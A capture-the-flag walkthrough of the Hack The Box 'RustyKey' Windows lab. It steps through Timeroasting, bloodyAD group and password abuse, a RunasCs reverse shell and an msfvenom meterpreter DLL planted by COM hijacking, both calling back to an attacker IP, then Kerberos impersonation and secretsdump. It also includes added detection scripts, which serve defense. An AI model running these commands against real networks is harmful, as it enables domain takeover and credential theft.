HTB-RustyKey

Box Info

Difficulty: Hard
OS: Windows
IP Address: 10.10.11.75

Port Scanning

# Check all open TCP
sudo rustscan -a 10.10.11.75 -g -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.75 -sCV -Pn -sT -p 53,88,135,139,445,464,593,3268,5985,389,9389,47001,49664,49665,49666,49671,49667,49669,49670,49677,49673,49674,49689,49718
# Nmap scan vulnerability
sudo nmap -sT -p 53,88,135,139,445,464,593,3268,5985,389,9389,47001,49664,49665,49666,49671,49667,49669,49670,49677,49673,49674,49689,49718 --script=vuln -O -Pn 10.10.11.75
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.75

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-02 15:38:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49718/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-07-02T15:39:39
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h37m19s

Update DNS

sudo nano /etc/hosts
10.10.11.75 dc.rustykey.htb rustykey.htb

Update krb5.conf

[libdefaults]
default_realm = RUSTYKEY.HTB
dns_lookup_realm = false
dns_lookup_kdc = false

[realms]
RUSTYKEY.HTB = {
kdc = dc.rustykey.htb
admin_server = dc.rustykey.htb
default_domain = rustykey.htb
}

[domain_realm]
.rustykey.htb = RUSTYKEY.HTB
rustykey.htb = RUSTYKEY.HTB

Credentials

As is common in real life Windows pentests, you will start the RustyKey box with credentials for the following account

rr.parker : 8#t5HE8L!W3A

Service Enumeration

389/tcp - LDAP

ldapsearch -x -H ldap://10.10.11.75 -D 'rr.parker@rustykey.htb' -w '8#t5HE8L!W3A' -b 'dc=rustykey,dc=htb' "(objectClass=user)" userPrincipalName
  • Result

    # Administrator, Users, rustykey.htb
    dn: CN=Administrator,CN=Users,DC=rustykey,DC=htb

    # Guest, Users, rustykey.htb
    dn: CN=Guest,CN=Users,DC=rustykey,DC=htb

    # DC, Domain Controllers, rustykey.htb
    dn: CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb

    # krbtgt, Users, rustykey.htb
    dn: CN=krbtgt,CN=Users,DC=rustykey,DC=htb

    # Support-Computer1, Computers, Support, rustykey.htb
    dn: CN=Support-Computer1,OU=Computers,OU=Support,DC=rustykey,DC=htb

    # Support-Computer2, Computers, Support, rustykey.htb
    dn: CN=Support-Computer2,OU=Computers,OU=Support,DC=rustykey,DC=htb

    # Support-Computer3, Computers, Support, rustykey.htb
    dn: CN=Support-Computer3,OU=Computers,OU=Support,DC=rustykey,DC=htb

    # Support-Computer4, Computers, Support, rustykey.htb
    dn: CN=Support-Computer4,OU=Computers,OU=Support,DC=rustykey,DC=htb

    # Support-Computer5, Computers, Support, rustykey.htb
    dn: CN=Support-Computer5,OU=Computers,OU=Support,DC=rustykey,DC=htb

    # Finance-Computer1, Computers, Finance, rustykey.htb
    dn: CN=Finance-Computer1,OU=Computers,OU=Finance,DC=rustykey,DC=htb

    # Finance-Computer2, Computers, Finance, rustykey.htb
    dn: CN=Finance-Computer2,OU=Computers,OU=Finance,DC=rustykey,DC=htb

    # Finance-Computer3, Computers, Finance, rustykey.htb
    dn: CN=Finance-Computer3,OU=Computers,OU=Finance,DC=rustykey,DC=htb

    # Finance-Computer4, Computers, Finance, rustykey.htb
    dn: CN=Finance-Computer4,OU=Computers,OU=Finance,DC=rustykey,DC=htb

    # Finance-Computer5, Computers, Finance, rustykey.htb
    dn: CN=Finance-Computer5,OU=Computers,OU=Finance,DC=rustykey,DC=htb

    # IT-Computer1, Computers, IT, rustykey.htb
    dn: CN=IT-Computer1,OU=Computers,OU=IT,DC=rustykey,DC=htb

    # IT-Computer2, Computers, IT, rustykey.htb
    dn: CN=IT-Computer2,OU=Computers,OU=IT,DC=rustykey,DC=htb

    # IT-Computer3, Computers, IT, rustykey.htb
    dn: CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb

    # IT-Computer4, Computers, IT, rustykey.htb
    dn: CN=IT-Computer4,OU=Computers,OU=IT,DC=rustykey,DC=htb

    # IT-Computer5, Computers, IT, rustykey.htb
    dn: CN=IT-Computer5,OU=Computers,OU=IT,DC=rustykey,DC=htb

    # rr.parker, Users, rustykey.htb
    dn: CN=rr.parker,CN=Users,DC=rustykey,DC=htb
    userPrincipalName: rr.parker@rustykey.htb

    # mm.turner, Users, rustykey.htb
    dn: CN=mm.turner,CN=Users,DC=rustykey,DC=htb
    userPrincipalName: mm.turner@rustykey.htb

    # bb.morgan, Users, IT, rustykey.htb
    dn: CN=bb.morgan,OU=Users,OU=IT,DC=rustykey,DC=htb
    userPrincipalName: bb.morgan@rustykey.htb

    # gg.anderson, Users, IT, rustykey.htb
    dn: CN=gg.anderson,OU=Users,OU=IT,DC=rustykey,DC=htb
    userPrincipalName: gg.anderson@rustykey.htb

    # dd.ali, Users, Finance, rustykey.htb
    dn: CN=dd.ali,OU=Users,OU=Finance,DC=rustykey,DC=htb
    userPrincipalName: dd.ali@rustykey.htb

    # ee.reed, Users, Support, rustykey.htb
    dn: CN=ee.reed,OU=Users,OU=Support,DC=rustykey,DC=htb
    userPrincipalName: ee.reed@rustykey.htb

    # nn.marcos, Users, rustykey.htb
    dn: CN=nn.marcos,CN=Users,DC=rustykey,DC=htb
    userPrincipalName: nn.marcos@rustykey.htb

    # backupadmin, Users, rustykey.htb
    dn: CN=backupadmin,CN=Users,DC=rustykey,DC=htb
    userPrincipalName: backupadmin@rustykey.htb

    # search reference
    ref: ldap://ForestDnsZones.rustykey.htb/DC=ForestDnsZones,DC=rustykey,DC=htb

    # search reference
    ref: ldap://DomainDnsZones.rustykey.htb/DC=DomainDnsZones,DC=rustykey,DC=htb

    # search reference
    ref: ldap://rustykey.htb/CN=Configuration,DC=rustykey,DC=htb

Bloodhound

Correct Clock Skew

sudo timedatectl set-ntp 0
sudo ntpdate -u 10.10.11.75

Obtain ticket

impacket-getTGT rustykey.htb/rr.parker:'8#t5HE8L!W3A'
chmod 600 rr.parker.ccache
export KRB5CCNAME=rr.parker.ccache

Enumerate Domain info

bloodhound-python -u "rr.parker" -p '8#t5HE8L!W3A' -d rustykey.htb -c All --zip -ns 10.10.11.75 -k

Extract users list

ldapsearch -D rustykey\\rr.parker -H ldap://10.10.11.75 -w '8#t5HE8L!W3A' -b 'CN=Users,DC=rustykey,DC=htb' | grep name: | sed 's/^name: //' | grep -vE 'D|C|A|U' > users.txt

IT-COMPUTER3$ can add itself to the HELPDESK group

Once it is a member, the HELPDESK group gives it privileges over DD.ALI, BB.MORGAN, GG.ANDERSON and EE.REED

The MM.TURNER user has AddAllowedToAct rights on the Domain Controller

BB.MORGAN, GG.ANDERSON and EE.REED have the privilege to use WinRM

Initiate User Foothold

Timeroasting of IT-COMPUTER3$

https://github.com/SecuraBV/Timeroast

Timeroasting takes advantage of Windows’ NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account’s RID. This is not a problem when computer accounts are properly generated, but if a non-standard or legacy default password is set this tool allows you to brute-force those offline.
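
Detection logic for the request pattern described above, added here as an example (it is not part of the Timeroast project or of the original write-up): it flags a source that sends authenticated NTP client requests naming many different RIDs in a short window, on the assumption that a normal domain member only ever asks for its own RID. The 68-byte request layout, the little-endian Key Identifier, the thresholds and the 192.0.2.x sample packets are assumptions constructed for the illustration.

```python
import struct
from collections import defaultdict

NTP_HEADER_LEN = 48      # fixed NTP header
AUTH_LEN = 4 + 16        # assumed authenticator: 4-byte Key Identifier + 16-byte checksum
RID_MASK = 0x7FFFFFFF    # assumed: top bit of the Key Identifier selects the previous password


def rid_from_request(payload: bytes):
    """Return the RID named in an authenticated NTP client request, else None."""
    if len(payload) != NTP_HEADER_LEN + AUTH_LEN:
        return None                       # plain (unauthenticated) NTP or unrelated traffic
    if payload[0] & 0x07 != 3:            # NTP mode 3 = client
        return None
    (key_id,) = struct.unpack_from("<I", payload, NTP_HEADER_LEN)  # assumed little-endian
    return key_id & RID_MASK


def find_rid_sweeps(packets, window=60.0, min_rids=5):
    """packets: iterable of (timestamp_seconds, source_ip, udp_payload).

    Returns {source_ip: sorted RIDs} for every source that named at least
    `min_rids` distinct RIDs within any `window`-second span.
    """
    by_src = defaultdict(list)
    for ts, src, payload in packets:
        rid = rid_from_request(payload)
        if rid is not None:
            by_src[src].append((ts, rid))

    alerts = {}
    for src, seen in by_src.items():
        seen.sort()
        start = 0
        for end in range(len(seen)):
            # Slide the window start forward until the span fits.
            while seen[end][0] - seen[start][0] > window:
                start += 1
            if len({rid for _, rid in seen[start:end + 1]}) >= min_rids:
                alerts[src] = sorted({rid for _, rid in seen})
                break
    return alerts


def sample_request(rid: int) -> bytes:
    """Constructed 68-byte request: LI=0, VN=4, mode=3, other fields zeroed."""
    return bytes([0x23]) + bytes(47) + struct.pack("<I", rid) + bytes(16)


# Constructed traffic: one source walking ten RIDs in ten seconds, one domain
# member repeating its own RID, and one plain 48-byte NTP client request.
SAMPLE_PACKETS = (
    [(float(i), "192.0.2.50", sample_request(1100 + i)) for i in range(10)]
    + [(30.0 * i, "192.0.2.21", sample_request(1125)) for i in range(10)]
    + [(5.0, "192.0.2.30", bytes([0x23]) + bytes(47))]
)

if __name__ == "__main__":
    for src, rids in find_rid_sweeps(SAMPLE_PACKETS).items():
        print(f"{src}: authenticated NTP requests for {len(rids)} distinct RIDs: {rids}")
```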

Prep for the environment

git clone https://github.com/SecuraBV/Timeroast
python3 -m venv venv
source venv/bin/activate

Inside the extra-scripts directory there is a timecrack.py, which we will use for the Timeroasting

#!/usr/bin/env python3

"""Perform a simple dictionary attack against the output of timeroast.py. Necessary because
the NTP 'hash' format unfortunately does not fit into Hashcat or John right now.

Not even remotely optimized, but still useful for cracking legacy default passwords (where the
password is the computer name) or specific default passwords that are popular in an organisation.
"""

from binascii import hexlify, unhexlify
from argparse import ArgumentParser, FileType, RawDescriptionHelpFormatter
from typing import TextIO, Generator, Tuple
import hashlib, sys, re

# <rid>:$sntp-ms$<16-byte hash as hex>$<48-byte salt as hex>
HASH_FORMAT = r'^(?P<rid>\d+):\$sntp-ms\$(?P<hashval>[0-9a-f]{32})\$(?P<salt>[0-9a-f]{96})$'

def md4(data: bytes) -> bytes:
    try:
        return hashlib.new('md4', data).digest()
    except ValueError:
        from md4 import MD4  # Fallback to pure Python if OpenSSL has no MD4
        return MD4(data).bytes()

def compute_hash(password: str, salt: bytes) -> bytes:
    """Compute a legacy NTP authenticator 'hash'."""
    return hashlib.md5(md4(password.encode('utf-16le')) + salt).digest()

def try_crack(hashfile: TextIO, dictfile: TextIO) -> Generator[Tuple[int, str], None, None]:
    # Load every hash line first; abort on the first malformed one.
    hashes = []
    for line in hashfile:
        line = line.strip()
        if line:
            m = re.match(HASH_FORMAT, line)
            if not m:
                print(f'ERROR: invalid hash format: {line}', file=sys.stderr)
                sys.exit(1)
            rid, hashval, salt = m.group('rid', 'hashval', 'salt')
            hashes.append((int(rid), unhexlify(hashval), unhexlify(salt)))

    # Try each candidate password against every loaded hash.
    for password in dictfile:
        password = password.strip()
        for rid, hashval, salt in hashes:
            if compute_hash(password, salt) == hashval:
                yield rid, password

def main():
    argparser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description="""Perform a simple dictionary attack against the output of timeroast.py.

Not even remotely optimized, but still useful for cracking legacy default
passwords (where the password is the computer name) or specific default
passwords that are popular in an organisation.""")

    argparser.add_argument('hashes', type=FileType('r'), help='Output of timeroast.py')
    #argparser.add_argument('dictionary', type=FileType('r'), help='Line-delimited password dictionary') <-- comment this line and add the line below
    argparser.add_argument('dictionary', type=lambda f: open(f, encoding='latin-1'), help='Line-delimited password dictionary (e.g. rockyou.txt)')
    args = argparser.parse_args()

    crackcount = 0
    for rid, password in try_crack(args.hashes, args.dictionary):
        print(f'[+] Cracked RID {rid} password: {password}')
        crackcount += 1

    print(f'\n{crackcount} passwords recovered.')

if __name__ == '__main__':
    main()

python3 timeroast.py 10.10.11.75 -o rustykey.hashes

# Modify the timecrack.py
python3 timecrack.py rustykey.hashes /usr/share/wordlists/rockyou.txt

Here we get the password Rusty88!, and checking BloodHound for RID 1125 shows that it belongs to IT-COMPUTER3$

Here we can abuse this password to add IT-COMPUTER3$ to the HELPDESK group

AddSelf to HELPDESK

bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'

ForceChangePassword to BB.MORGAN

bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password BB.MORGAN 'Password123'

Remove Protected Objects

bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'

Now we can obtain a Kerberos ticket for BB.MORGAN

impacket-getTGT 'RUSTYKEY.HTB/BB.MORGAN:Password123'
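
The chain above (a computer account adding itself to HELPDESK, resetting BB.MORGAN's password and removing a member from PROTECTED OBJECTS) leaves group-change and password-reset events in the domain controller's Security log. The correlation below is an added example, not part of the original write-up; the event records, SIDs, the `svc.helpdesk` account and the 30-minute window are constructed, and the field names assume the standard fields of events 4728/4729/4724 with account-management auditing enabled.

```python
from datetime import datetime, timedelta

# Windows Security event IDs logged on a domain controller
GROUP_ADD = {4728, 4732, 4756}      # member added to a global / local / universal security group
GROUP_REMOVE = {4729, 4733, 4757}   # member removed from such a group
PASSWORD_RESET = 4724               # attempt to reset another account's password


def correlate_self_add(events, window=timedelta(minutes=30)):
    """Find machine accounts that add themselves to a group and then, within
    `window` of the latest self-add, reset passwords or remove group members."""
    findings = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        actor = ev["SubjectUserName"]
        if not actor.endswith("$"):
            continue                                  # only machine accounts matter here
        eid = ev["EventID"]
        if eid in GROUP_ADD and ev.get("MemberSid") == ev["SubjectUserSid"]:
            entry = findings.setdefault(actor, {"groups": [], "since": None, "follow_ups": []})
            entry["groups"].append(ev["TargetUserName"])   # TargetUserName = group name
            entry["since"] = ev["time"]
        elif actor in findings and ev["time"] - findings[actor]["since"] <= window:
            if eid == PASSWORD_RESET:
                findings[actor]["follow_ups"].append(("password reset", ev["TargetUserName"]))
            elif eid in GROUP_REMOVE:
                findings[actor]["follow_ups"].append(("group member removed", ev["TargetUserName"]))
    # A self-add with no follow-up action is left out of the result.
    return {actor: f for actor, f in findings.items() if f["follow_ups"]}


# ---- constructed sample events (placeholder domain SID, RID 1125 as in the text) ----
BASE = datetime(2025, 7, 2, 15, 40)
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
COMPUTER_SID = DOMAIN_SID + "-1125"


def make_event(minute, eid, subject, subject_sid, target, member_sid=None):
    return {"time": BASE + timedelta(minutes=minute), "EventID": eid,
            "SubjectUserName": subject, "SubjectUserSid": subject_sid,
            "TargetUserName": target, "MemberSid": member_sid}


SAMPLE_EVENTS = [
    make_event(0, 4728, "IT-COMPUTER3$", COMPUTER_SID, "HELPDESK", member_sid=COMPUTER_SID),
    make_event(1, 4724, "IT-COMPUTER3$", COMPUTER_SID, "bb.morgan"),
    make_event(2, 4729, "IT-COMPUTER3$", COMPUTER_SID, "PROTECTED OBJECTS",
               member_sid=DOMAIN_SID + "-9001"),
    # Benign noise: a (hypothetical) help-desk service account resetting a password,
    # and an administrator adding a different account to a group.
    make_event(10, 4724, "svc.helpdesk", DOMAIN_SID + "-9002", "dd.ali"),
    make_event(50, 4728, "Administrator", DOMAIN_SID + "-500", "HELPDESK",
               member_sid=DOMAIN_SID + "-9003"),
]

if __name__ == "__main__":
    for actor, f in correlate_self_add(SAMPLE_EVENTS).items():
        print(f"{actor} added itself to {f['groups']} and then: {f['follow_ups']}")
```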

BB.MORGAN shell

export KRB5CCNAME=BB.MORGAN.ccache
evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

User Flag

Privilege Escalation

internal.pdf

On the user's desktop we found an internal.pdf file

Use WinRM to transfer it to Kali

download internal.pdf

It is a memo from BB.MORGAN to support-team

The memo describes that the Support Group temporarily receives extended rights such as access to Registry Keys, and from BloodHound we know that the EE.REED user belongs to the SUPPORT group

Here we will remove SUPPORT from Protected Objects and abuse the HELPDESK group to ForceChangePassword the EE.REED user, then log in as EE.REED with a WinRM session

EE.REED Shell

# Add IT-COMPUTER3$ OU to the HELPDESK again
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'

# Remove Support OU from PROTECTED OBJECTS
bloodyAD --kerberos --dc-ip 10.10.11.75 --host dc.rustykey.htb -d rustykey.htb -u IT-COMPUTER3$ -p 'Rusty88!' remove groupMember "CN=PROTECTED OBJECTS,CN=USERS,DC=RUSTYKEY,DC=HTB" "SUPPORT"

# ForceChangePassword user EE.REED
bloodyAD --kerberos --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password ee.reed 'P@ssword123'

impacket-getTGT -dc-ip 10.10.11.75 rustykey.htb/ee.reed:'P@ssword123'

export KRB5CCNAME=ee.reed.ccache
evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB -u ee.reed

Looks like we cannot establish an EE.REED shell with WinRM. Upon checking writeups, it seems this can only be done with RunasCs via our existing shell with BB.MORGAN

Upload RunasCS.exe

iwr -uri http://10.10.14.11/RunasCs.exe -o RunasCs.exe
.\RunasCs.exe ee.reed P@ssword123 cmd.exe -r 10.10.14.11:4444

MM.TURNER Shell

Prep for msfconsole

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4445
run -j

We can set up a DLL-based meterpreter backdoor via a COM hijacking vulnerability

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=4445 -f dll -o rev.dll

mkdir C:\Tools
upload rev.dll

Add the DLL path to registry

reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\Tools\rev.dll" /f

After a few seconds we get a reverse shell. We need to be quick here, as the session dies quickly.

Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$

Now MM.TURNER should have the AddAllowedToAct privilege on the RUSTYKEY Domain Controller

Initiate Root Foothold

Impersonate Domain Admin Account

Here we will use S4U2Self to impersonate a domain admin account

impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'

export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

Here we can abuse the ESC1 Technique for Alternative DCSync (Mimikatz).

Unintended way - Backupadmin Shell

impacket-wmiexec -k -no-pass 'RUSTYKEY.HTB/backupadmin@dc.rustykey.htb'

backupadmin has the privilege to access the Administrator path

Secretsdump

impacket-secretsdump -k -no-pass 'RUSTYKEY.HTB/backupadmin@dc.rustykey.htb'